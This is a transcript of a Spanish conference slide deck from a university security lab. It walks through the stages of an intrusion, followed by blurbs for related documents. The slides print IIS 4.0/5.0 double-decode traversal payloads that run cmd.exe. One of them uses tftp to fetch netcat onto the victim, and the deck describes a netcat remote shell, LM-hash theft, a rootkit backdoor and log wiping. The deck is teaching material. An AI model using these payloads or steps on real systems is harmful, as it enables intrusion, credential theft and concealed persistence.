La Praxis del Cracker

Tamaño: px
Comenzar la demostración a partir de la página:

Download "La Praxis del Cracker"

Transcripción

1 La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo Margarita

2 GISTI USB Laboratorio de Seguridad en Tecnología de la Información

3 La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas. Simson Garfinkel y Eugene Spafford (1999)

4

5 Footprinting (Hallar el Rastro)

6

7

8

9

10

11

12

13 Scanning (Exploración)

14

15

16

17

18

19

20 - La salida ya provee un indicio del servidor web que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como nmap de Fyodor, que identifican el sistema operativo usando TCP Stack Fingerprinting se puede obtener una información más confiable

21

22

23 Enumeration (Enumeración)

24

25

26

27

28

29

30

31

32

33

34

35

36 Gainning Access (Ganar Acceso)

37 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando dir de la consola de comandos través del servidor La Praxis del Cracker amts Margarita 2007

38 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ -..%255c.. =..(%25)5c.. =..%5c.. =..(%5c).. =.. \ Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \

39

40

41

42

43

44

45

46 %255c../.. %255c../winnt/system32/cmd.exe? c+c:\winnt/system32/tftp.exe+i get+nc.exe - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.

47

48

49

50 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\inetpub\scripts - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.

51

52 Hora de transferir un exploit - Httpodbc.dll es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad Decode del IIS 4.0 y Para el servidor web del sistema de la víctima este programa parecerá un código script que ha sido colocado para que los usuarios finales lo ejecuten

53

54

55

56

57

58

59

60 Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del servidor web IIS 4.0 o 5.0

61 Escalating Privilege (Escalar Privilegios)

62

63 Con esta orden se procede a ejecutar NETCAT la navaja del ejército suizo de Hackers de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un nuevo servicio de comandos queda escuchando desde ese instante

64

65

66

67

68 Desde una consola de comandos local el atacante- ejecuta ahora un telnet al puerto 7001 del sistema de la víctima La idea es disponer de un login remoto que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un terminal virtual en la red

69

70 Con el Telnet se ha establecido una conexión TCP a la consola de comandos que escucha peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio transparente Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local

71

72

73

74

75 Pilfering (Ratería, Vileza, Bajeza, Ruindad)

76 El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo Crackeador

77 Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema

78 Creating Backdoors (Crear las Puertas Traseras)

79 Ahora el Cracker puede sembrar calquier programa tipo backdoor que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad Decode del IIS 4.0 y 5.0 es subsanada

80

81

82 Rootkit HD 1.0 versión de evaluación - Opera en sistemas WNT/W2K/WXP - Parecido a un troyano, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta - Genera un nuevo servicio Hacker Defender 100 sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente bdclient - Puede adaptar su funcionamiento para disponer de distintas formas de operación - Provee facilidad de contraseña para controlar su ejecución

83 Covering Tracks (Cubrir las Huellas)

84 Finalmente, si se han transferido programas para alterar los logs, el Cracker puede borrar fácilmente toda huella de su actividad. En caso contrario puede hacerlo manualmente

85

86

87

88

89 Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo

90 CIERRE Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro. Sun Tzu El Arte de la Guerra

Presentación del curso Presencial

Presentación del curso Presencial Presentación del curso Presencial Seguridad Informática y Hacking Ético Módulo I Tabla de contenido Presentación del curso... 3 Objetivos de aprendizaje... 5 Contenidos del curso... 6 Competencias previas...

Más detalles

Seguridad y Alta Disponibilidad: Ataques

Seguridad y Alta Disponibilidad: Ataques Seguridad y Alta Disponibilidad: Ataques Jesús Moreno León Alberto Molina Coballes jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012 Jesús Moreno León, Alberto Molina Coballes Septiembre de 2012 Algunos

Más detalles

LECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix

LECCION-2. Por omitir las cosas triviales se comenten grandes errores. Cursos de Entrenamiento de Servidores Linux y Telefonía IP con Asterisk/Elastix LECCION-2 CONFIGURACION DE APLICATIVOS DE ACCESO REMOTO En esta lección, aprenderemos como configurar los programas aplicativos para acceder remotamente al servidor Elastix desde la interfaz grafica Web

Más detalles

Consideraciones básicas de seguridad

Consideraciones básicas de seguridad Buenas prácticas de seguridad para servidores windows Consideraciones básicas de seguridad Deshabilita los usuarios de invitado (guest) En algunas versiones de windows los usuarios de invitado vienen por

Más detalles

Pues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético).

Pues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético). Pues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético). Comenzamos con algunos laboratorios sencillos y simples que nos permitirán

Más detalles

METASPLOITABLE2: ANÁLISIS DE VULNERABILIDADES

METASPLOITABLE2: ANÁLISIS DE VULNERABILIDADES [Escriba aquí] [Escriba aquí] [Escriba aquí] METASPLOITABLE2: ANÁLISIS DE VULNERABILIDADES Mikel Xabier Marturet Artiaga Contenido METASPOITABLE 2: ANÁLISIS DE VULNERABILIDADES... 1 PUERTO 512:TCP... 4

Más detalles

PRÁCTICAS FTP CLIENTES

PRÁCTICAS FTP CLIENTES 1.-Uso del navegador como cliente FTP. Para utilizar el navegador como cliente basta con teclear la URL del servidor en la barra de direcciones. Para navegar por las carpetas, simplemente pinchamos en

Más detalles

TEMA: LOS SISTEMAS OPERATIVOS

TEMA: LOS SISTEMAS OPERATIVOS TEMA 1. LOS SISTEMAS OPERATIVOS 1 Introducción En este tema, estudiaremos los sistemas operativos como el primer software que necesita cargar el ordenador en el arranque, y que tiene la responsabilidad

Más detalles

SEGURIDAD Y ALTA DISPONIBILIDAD

SEGURIDAD Y ALTA DISPONIBILIDAD SEGURIDAD Y ALTA DISPONIBILIDAD 1 Nombre: Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar e identificar en los siguientes tipos: De configuración: Si

Más detalles

MANUAL DE ADMINISTRACIÓN BÁSICA v. 1.0

MANUAL DE ADMINISTRACIÓN BÁSICA v. 1.0 skina@skinatech.com http://www.skinatech.com PBX.: 226-2080 Mobile:310 288-0916 Carrera 64 # 96-17 Bogotá D.C. MANUAL DE ADMINISTRACIÓN BÁSICA v. 1.0 Skina Tech Ltda brinda soluciones informáticas optimizando

Más detalles

Infraestructura RDS 2016

Infraestructura RDS 2016 105 Capítulo 3 Infraestructura RDS 2016 1. Introducción Infraestructura RDS 2016 Una infraestructura RDS 2016 se compone de varios servidores cada uno con un rol bien definido para satisfacer las demandas

Más detalles

Ethical Hacking. Programa de Estudio.

Ethical Hacking. Programa de Estudio. Ethical Hacking Programa de Estudio Ethical Hacking Aprende las técnicas más utilizadas por los hackers y cómo utilizarlas para analizar la seguridad de las redes empresariales. Vas a conocer los conceptos

Más detalles

Auditando con Nmap y sus scripts para escanear vulnerabilidades

Auditando con Nmap y sus scripts para escanear vulnerabilidades Auditando con Nmap y sus scripts para escanear vulnerabilidades Actualmente existen diversas herramientas de seguridad que se encargan de ejecutar diferentes funcionalidades, y si hablamos de auditorías

Más detalles

Manual de utilización del Tablón de Docencia de la Universidad de Granada.

Manual de utilización del Tablón de Docencia de la Universidad de Granada. Manual de utilización del Tablón de Docencia de la Universidad de Granada. INTRODUCCIÓN El objetivo de este tablón virtual es el facilitar el intercambio de información electrónica entre los participantes

Más detalles

3æPROTOCOLOSYFUNCIONALIDADDELACAPADEAPLICACIÓN 3.0INTRODUCCIÓNDELCAPITULO

3æPROTOCOLOSYFUNCIONALIDADDELACAPADEAPLICACIÓN 3.0INTRODUCCIÓNDELCAPITULO 3æPROTOCOLOSYFUNCIONALIDADDELACAPADEAPLICACIÓN 3.0.1Introduccióndelcapitulo 3.0INTRODUCCIÓNDELCAPITULO LamayoríadenosotroseperimentamosInternetatravésdeWorldWideWeb,serviciosdeermailyprogramaspara compartirarchivos.éstasymuchasotrasaplicacionesproporcionanlainterfazhumanaalaredsubyacente,loquenos

Más detalles

CentOS & Ubuntu Linux

CentOS & Ubuntu Linux Duración: 40 Horas Descripción del Curso: Este curso es para los usuarios de Linux que desean comenzar a construir habilidades desde nivel principiante y llegar a la administración de operativo, a un nivel

Más detalles

Caso actual: el malware DNSChanger Qué pueden hacer ahora los usuarios de ordenadores?

Caso actual: el malware DNSChanger Qué pueden hacer ahora los usuarios de ordenadores? Caso actual: el malware DNSChanger Qué pueden hacer ahora los usuarios de ordenadores? Contenido Qué ha ocurrido hasta ahora? 2 Qué va a ocurrir el 8 de marzo de 2012? 2 Cómo puedo probar mi configuración

Más detalles

Presentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO

Presentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO Presentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO Tabla de contenido LINUX - LPIC... 3 Presentación del curso... 3 Objetivos de aprendizaje...

Más detalles

Generación de Certificados SSL con IIS

Generación de Certificados SSL con IIS Generación de Certificados SSL con IIS Certicámara S.A USO: EXTERNO Página 1 de 41 CONTROL DE ACTUALIZACIONES Generación de Certificados SSL con IIS VERSIÓN 4.O VERSION FECHA ELABORADO REVISADO APROBADO

Más detalles

Conexión al servidor guernika y manipulación de archivos DESDE FUERA DE LAS AULAS

Conexión al servidor guernika y manipulación de archivos DESDE FUERA DE LAS AULAS ESCUELA POLITÉCNICA SUPERIOR LABORATORIO DEL DEPARTAMENTO DE INFORMÁTICA Conexión al servidor guernika y manipulación de archivos DESDE FUERA DE LAS AULAS Laboratorio del Departamento de Informática Universidad

Más detalles

PROTOCOLO FTP PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS ING. RAUL BAREÑO GUTIERREZ RAUL BAREÑO GUTIERREZ 1

PROTOCOLO FTP PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS ING. RAUL BAREÑO GUTIERREZ RAUL BAREÑO GUTIERREZ 1 PROTOCOLO FTP PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS RAUL BAREÑO GUTIERREZ 1 FTP. Qué es? Es un protocolo que permite pasar ficheros de un computador que los tiene (servidor FTP) a un computador que los

Más detalles

ABC de la ciberseguridad. Por: Gizard G.

ABC de la ciberseguridad. Por: Gizard G. ABC de la ciberseguridad Por: Gizard G. Adware Adware Que es? Software publicitario, le permite a un programador ofrecer sus productos de forma gratuita y convertirlos en dinero. Son pagados por una agencia

Más detalles

Workshop: Escritorios y aplicaciones virtuales con VMware Horizon y App Volumes

Workshop: Escritorios y aplicaciones virtuales con VMware Horizon y App Volumes Workshop: Escritorios y aplicaciones virtuales con VMware Horizon y App Volumes Al terminar el workshop, debe ser capaz de alcanzar los siguientes objetivos: Identificar los componentes de VMware Horizon

Más detalles

eica IT DDesenvolvemento e Formación

eica IT DDesenvolvemento e Formación OPEN SYSTEM eica IT DDesenvolvemento e Formación HACKING ÉTICO CARACTERÍSTICAS DURACIÓN Solicita información OBJETIVOS El programa de estudios prepara a: Responsables de red informática o responsables

Más detalles

Conexión de Sistemas en Red

Conexión de Sistemas en Red Conexión de Sistemas en Red Ingresar Módulo de Red al Sistema Si usted ha adquirido el módulo de red para su sistema, deberá realizar los siguientes pasos para que éste quede configurado y listo para que

Más detalles

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)

Más detalles

Práctica de laboratorio: Instalación de Linux en una máquina virtual y exploración de la GUI

Práctica de laboratorio: Instalación de Linux en una máquina virtual y exploración de la GUI Práctica de laboratorio: Instalación de Linux en una máquina virtual y exploración de la GUI Objetivos Parte 1: Preparar una computadora para la virtualización Parte 2: Instalar un sistema operativo Linux

Más detalles

Migración de una base de datos a otro servidor de Base de Datos en MySQL (mapaches)

Migración de una base de datos a otro servidor de Base de Datos en MySQL (mapaches) Migración de una base de datos a otro servidor de Base de Datos en MySQL (mapaches) La migración de una base de datos es muy fácil utilizando el programa phpmyadmin en el cual se selecciona la base de

Más detalles

ANALISIS DE VULNERABILIDADES

ANALISIS DE VULNERABILIDADES I. DIRIGIDO A. RICARDO ORTIZ LESTRADE ERIC HERRERO LOZANO MIGUEL ANGEL LEITE GOMEZ EMANUEL URBINA GARCIA COORDINADOR OFICINA PROYECTOS COORDINADOR CONTROL DE CAMBIO ADMON. SERV. RESPONSABLE GENERAL DE

Más detalles

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez INTRODUCCIÓN Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar

Más detalles

ACCESO A LA PLATAFORMA VIRTUAL DE APLICACIONES

ACCESO A LA PLATAFORMA VIRTUAL DE APLICACIONES ACCESO A LA PLATAFORMA VIRTUAL DE APLICACIONES Contenido Introducción... 3 Acceso... 4 Configuración para WINDOWS (Acceso Web)... 5 Configuración para UBUNTU/LINUX (Acceso Web)... 8 Configuración para

Más detalles

PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática

PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE. Ing. Javier Hernández Calderón Consultor en Seguridad Informática PRUEBAS DE PENETRACIÓN EN AMBIENTES DE NUBE Ing. Javier Hernández Calderón Consultor en Seguridad Informática Que es la nube de internet? Dónde están las aplicaciones y mis datos? Acceso, desde cualquier

Más detalles

Qwertyuiopasdfghjklzxcvbnmqwerty uiopas_redes_de_comunicación_ghjkl zn_vulnerabilidades_intrusiones_mq wertyuiopasdfghjklzxcvbnmqwertyui

Qwertyuiopasdfghjklzxcvbnmqwerty uiopas_redes_de_comunicación_ghjkl zn_vulnerabilidades_intrusiones_mq wertyuiopasdfghjklzxcvbnmqwertyui Qwertyuiopasdfghjklzxcvbnmqwerty uiopas_redes_de_comunicación_ghjkl zn_vulnerabilidades_intrusiones_mq wertyuiopasdfghjklzxcvbnmqwertyui Vulnerabilidades e Intrusiones opasdfghjklzxcvbnmqwertyuiopasdfg

Más detalles

Trabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS. Hecho por Jesús López y Jesús Losada.

Trabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS. Hecho por Jesús López y Jesús Losada. Trabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS Hecho por Jesús López y Jesús Losada. 1 Índice Qué es la administración remota? Que servicios ofrece? Acceso en modo Texto Telnet SSH

Más detalles

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas Introducción 1. Preámbulo 15 2. Desciframiento de un ataque conseguido 17 3. Descifrado de contramedidas eficaces 18 3.1 Análisis de riesgos reales 18 3.2 Consideraciones técnicas 19 3.3 Consideraciones

Más detalles

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios INTRODUCCION Tema: Protocolo de la Capa de aplicación. FTP HTTP Autor: Julio Cesar Morejon Rios Qué es FTP? FTP (File Transfer Protocol) es un protocolo de transferencia de archivos entre sistemas conectados

Más detalles

Certified Ethical Hacker Duración: 40 horas Código: CEH-001

Certified Ethical Hacker Duración: 40 horas Código: CEH-001 Certified Ethical Hacker Duración: 40 horas Código: CEH-001 Descripción: En el presente curso, el participante obtiene el conocimiento para poder ingresar como si fuera un intruso real para evaluar seguridad

Más detalles

ESTRATEGIAS PARA LA RECOLECCIÓN DE PRUEBAS ELECTRÓNICAS

ESTRATEGIAS PARA LA RECOLECCIÓN DE PRUEBAS ELECTRÓNICAS ESTRATEGIAS PARA LA RECOLECCIÓN DE PRUEBAS ELECTRÓNICAS Llevar un orden de recopilación de información Si la recolección de datos se realiza correctamente y de una manera ordenada, es mucho más útil en

Más detalles

Módulo Call Center. Guía de instalación v 1.2

Módulo Call Center. Guía de instalación v 1.2 Módulo Call Center Guía de instalación v 1.2 DINOMI Septiembre 2018 TABLA DE CONTENIDO CONFIGURACIÓN DE DINOMI... 4 PASO 1: INSTALACIÓN DE DINOMI... 4 PASO 2: CONEXIÓN A UN PBX EXTERNO... 8 CREACIÓN DE

Más detalles

Instalación de Crystal Reports

Instalación de Crystal Reports Instalación de Crystal Reports Este capítulo explica cómo se instala Crystal Reports localmente desde el CD del producto. También explica cómo instalar Crystal Reports en un servidor de red y cómo instalarlo

Más detalles

Aprenda Seguridad Ofensiva Conviértase en Hacker Ético!

Aprenda Seguridad Ofensiva Conviértase en Hacker Ético! Aprenda Seguridad Ofensiva Conviértase en Hacker Ético! INTRO-HACKING WORKSHOP Dirigido a: Profesionales y Estudiantes de Sistemas, Redes, Auditoría y Seguridad Informática. Seminario práctico intensivo

Más detalles

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita. Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo

Más detalles

Seguridad Informática: Técnicas hacker

Seguridad Informática: Técnicas hacker Seguridad Informática: Técnicas hacker Jesús Moreno León j.morenol@gmail.com Septiembre 2010 Estas diapositias son una obra derivada de los seminarios de formación impartidos por por Marta Beltrán y Antonio

Más detalles

TEMARIO CERTIFICACIÓN DE SEGURIDAD OFENSIVA G.H.O.S.T

TEMARIO CERTIFICACIÓN DE SEGURIDAD OFENSIVA G.H.O.S.T TEMARIO CERTIFICACIÓN DE SEGURIDAD OFENSIVA G.H.O.S.T Dirigido a: Estudiantes y profesionistas que busquen aprender sobre seguridad informática desde una base práctica. El curso está diseñado para principiantes,

Más detalles

Modelo OSI y TCP/IP. Teleprocesamiento Ing. Zoila Marquez.

Modelo OSI y TCP/IP. Teleprocesamiento Ing. Zoila Marquez. Modelo OSI y TCP/IP Teleprocesamiento Ing. Zoila Marquez. Modelo OSI El Modelo OSI divide en 7 capas el proceso de transmisión de la información entre equipo informáticos, donde cada capa se encarga de

Más detalles

CETIC CHIAPAS. Coordinacion Estatal de Tecnologias de la Informacion y Comunicaciones RANSOMWARE WANNACRY. Pá giná 1

CETIC CHIAPAS. Coordinacion Estatal de Tecnologias de la Informacion y Comunicaciones RANSOMWARE WANNACRY. Pá giná 1 Coordinacion Estatal de Tecnologias de la Informacion y Comunicaciones RANSOMWARE WANNACRY Pá giná 1 Amenaza Ránsonwáre WánnáCry es un málwáre que áfectá á sistemás operátivos Windows el cuál cifrá árchivos

Más detalles

UD5 Actividad 1 Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores)

UD5 Actividad 1 Utilización cliente FTP (mediante línea de comandos, entornos gráficos y navegadores/exploradores) 2011-2012 UD5 Actividad 1 Utilización cliente FTP (mediante línea de comandos, entornos gráficos y José Jiménez Arias IES Gregorio Prieto MEDIANTE LINEA COMANDOS: Creamos un directorio, de nombre "pruebasftpasir04"

Más detalles

ECBTI Curso Herramientas Teleinformaticas MALWARE. Red de Tutores Herramientas TeleInformáticas

ECBTI Curso Herramientas Teleinformaticas MALWARE. Red de Tutores Herramientas TeleInformáticas ECBTI Curso Herramientas Teleinformaticas-201120 MALWARE Red de Tutores Herramientas TeleInformáticas Definición Es un software malicioso o software malintencionado, cuyo objetivo es infiltrarse para dañar

Más detalles

Multiplatform Network Administrator (160 Horas)

Multiplatform Network Administrator (160 Horas) En este curso, el participante instalará y configurará los sistemas operativos. Además, identificará las características de los entornos de gestión y realizará las tareas administrativas. Así mismo, ejecutará

Más detalles

NETCAT. En una de las máquina ponemos el netcat en modo servidor, a la escucha. En la otra, lo ponemos en modo cliente.

NETCAT. En una de las máquina ponemos el netcat en modo servidor, a la escucha. En la otra, lo ponemos en modo cliente. NETCAT 1. Descripción Netcat es una utilidad imprescindible para todo profesional de la seguridad. Es denominada la "navaja suiza de la seguridad de red" porque sirve para innumerables cosas. Fue creada

Más detalles

INSTALACION Y CONFIGURACION OPENSTACK. La instalación de OpenStack se realiza sobre el sistema operativo Ubuntu LTS Desktop.

INSTALACION Y CONFIGURACION OPENSTACK. La instalación de OpenStack se realiza sobre el sistema operativo Ubuntu LTS Desktop. INSTALACION Y CONFIGURACION OPENSTACK La instalación de OpenStack se realiza sobre el sistema operativo Ubuntu 14.04 LTS Desktop. Se comprueba si los scripts de configuración de OpenStack están disponibles

Más detalles

EJERCICIOS DE GUADALINEX V9 08

EJERCICIOS DE GUADALINEX V9 08 1. Crea un usuario denominado ejer8 con contraseña profeciclos (Utiliza el modo consola o un terminal), anota aquí la orden que darías. 2. Añade privilegios de administrador al usuario creado. (Utiliza

Más detalles

Hacking en 5 pasos usando Software libre

Hacking en 5 pasos usando Software libre Hacking en 5 pasos usando Ponente: JUAN DAVID BERRIO LOPEZ judabe2003@gmail.com Ingeniero en Informática. Especialista en redes Universidad san Buenaventura Posgrado en Seguridad Redes UOC, CCNSP Cyberoam/India

Más detalles

Manual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología

Manual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología Manual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología www.nucuncu.com Nucúncu Tecnología. www.nucuncu.com Manual para configurar un servidor

Más detalles

Cualquier equipo conectado a una red informática puede ser vulnerable a un ataque.

Cualquier equipo conectado a una red informática puede ser vulnerable a un ataque. Unidad 2: Ethical Hacking Introducción al Hacking Ético 1 El concepto de "hacking ético" o ethical hacking nace para cubrir un tipo de actividades en las que expertos en seguridad informática, utilizan

Más detalles

Compartir ficheros entre Macintosh vía TCP/IP

Compartir ficheros entre Macintosh vía TCP/IP Compartir ficheros entre Macintosh vía TCP/IP Este documento describe como compartir ficheros de un ordenador Mac con otro usuario de Mac utilizando TCP/IP. Para poder servir ficheros se debe estar ejecutando

Más detalles

Práctica de laboratorio: Control y administración de recursos del sistema en Windows Vista

Práctica de laboratorio: Control y administración de recursos del sistema en Windows Vista IT Essentials 5.0 5.3.3.6. Práctica de laboratorio: Control y administración de recursos del sistema en Windows Vista Introducción Imprima y complete esta práctica de laboratorio. En esta práctica de laboratorio,

Más detalles

Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media

Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Product ID: SV1108IPEXEU El conmutador KVM a través de IP con control remoto de servidor y 1 puerto USB PS/2 con medios virtuales,

Más detalles

Con arreglo a lo expuesto en el punto 2, nuestros ordenadores tienen instaladas las siguientes máquinas virtuales:

Con arreglo a lo expuesto en el punto 2, nuestros ordenadores tienen instaladas las siguientes máquinas virtuales: Guía de usuario de Virtual PC 2 Contenido 1.- Introducción.... 2 2.- Necesito una Máquina Virtual?... 2 3.- Máquinas Virtuales disponibles.... 2 4.- Manejo de la aplicación... 3 4.1.- Manejo básico....

Más detalles

FTP y Telnet. FTP /// Protocolo de transferencia de archivos (protocol transfer files) :) TELNET /// Emulador de terminales en sistemas remotos.

FTP y Telnet. FTP /// Protocolo de transferencia de archivos (protocol transfer files) :) TELNET /// Emulador de terminales en sistemas remotos. FTP y Telnet La explicación va dirigida a usuarios con Microsoft Windows, ya que es el sistema operativo más usado, pero cabe decir que tanto en linux, UNIX, etc. FTP /// Protocolo de transferencia de

Más detalles

Escaneo de un sistema con Backtrack 4

Escaneo de un sistema con Backtrack 4 Escaneo de un sistema con Backtrack 4 El escaneo de un sistema es el siguiente paso a llevar después de haber conocido nuestro objetivo, debemos puerto o que medios de comunicación esta utilizando. Vamos

Más detalles

4.4. TCP/IP - Configuración Parte 2 SIRL

4.4. TCP/IP - Configuración Parte 2 SIRL 4.4. TCP/IP - Configuración Parte 2 SIRL Configuración de parámetros de red Elementos de configuración relacionados con TCP/IP DIRECCIÓN IP Que se asigna al equipo MÁSCARA DE SUBRED Asignada al equipo

Más detalles

Javier Garson Desarrollador web Abril CSRF Falsificando peticiones

Javier Garson Desarrollador web Abril CSRF Falsificando peticiones Javier Garson Desarrollador web Abril 2016 CSRF Falsificando peticiones Acerca de mi Javier Garson Aparicio Desarrollador web 4 años de experiencia en desarrollo web 2 años de experiencia haciendo pruebas

Más detalles

Solución al Primer Reto

Solución al Primer Reto En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e

Más detalles

Cómo puede SmartMonitor Instalar la Base de Datos en. el dispositivo NAS a través de iscsi?

Cómo puede SmartMonitor Instalar la Base de Datos en. el dispositivo NAS a través de iscsi? Cómo puede SmartMonitor Instalar la Base de Datos en el dispositivo NAS a través de iscsi? Prólogo SCSI (Small Computer System Interface) ofrece una interfaz de transmisión de datos con alta velocidad

Más detalles

FUNDACIÓN TECNOLÓGICA DE COSTA RICA Instituto Tecnológico de Costa Rica. Configuración básica de un enrutador inalámbrico

FUNDACIÓN TECNOLÓGICA DE COSTA RICA Instituto Tecnológico de Costa Rica. Configuración básica de un enrutador inalámbrico FUNDACIÓN TECNOLÓGICA DE COSTA RICA Instituto Tecnológico de Costa Rica Curso: Redes Inalámbricas Medio: Práctica #1 Instructor: Ing. Eduardo Interiano. Configuración básica de un enrutador inalámbrico

Más detalles

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA How to de como habilitar el servicio de SSH en slackware. Carlos Juan Shephard G 2013-610 Sistema Operativo III Instructor: José Doñe OpenSSH es una versión LIBRE

Más detalles

Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Power Control

Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Power Control Switch Conmutador KVM Remoto de 1 Puerto VGA PS/2 USB por IP con Virtual Media Power Control Product ID: SV1108IPPWEU El conmutador KVM a través de IP con control remoto de 1 puerto y control de alimentación

Más detalles

SOR - Examen Teorico. 1 of 8 2/4/ :27 PM. Paralelo 1? Evaluaciones? SOR Examen Teorico. Comenzado: Feb 4 en 11:27pm

SOR - Examen Teorico. 1 of 8 2/4/ :27 PM. Paralelo 1? Evaluaciones? SOR Examen Teorico. Comenzado: Feb 4 en 11:27pm Paralelo 1? Evaluaciones? SOR Examen Teorico SOR - Examen Teorico Comenzado: Feb 4 en 11:27pm Question 1: 1 puntos El encargado de gestionar los permisos y los recursos es el [ Seleccionar ]. Question

Más detalles

1. Introducción. 2. Traza remoto. 2.1 Borrar cliente antiguo de la cache de Java

1. Introducción. 2. Traza remoto. 2.1 Borrar cliente antiguo de la cache de Java 1. Introducción La presente guía muestra los pasos para instalar o reinstalar la versión local de Traza 5.x así como acceder al Traza del servidor de APYDE en un equipo con Windows 10 (32/64 bits) en el

Más detalles

SISTEMAS OPERATIVOS - DEFINICIÓN:

SISTEMAS OPERATIVOS - DEFINICIÓN: 1/5 SISTEMAS OPERATIVOS - DEFINICIÓN: programa que controla la ejecución de los programas de aplicación y que actúa como interfaz entre las aplicaciones del usuario y el HW de una computadora - OBJETIVOS:

Más detalles

info.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com

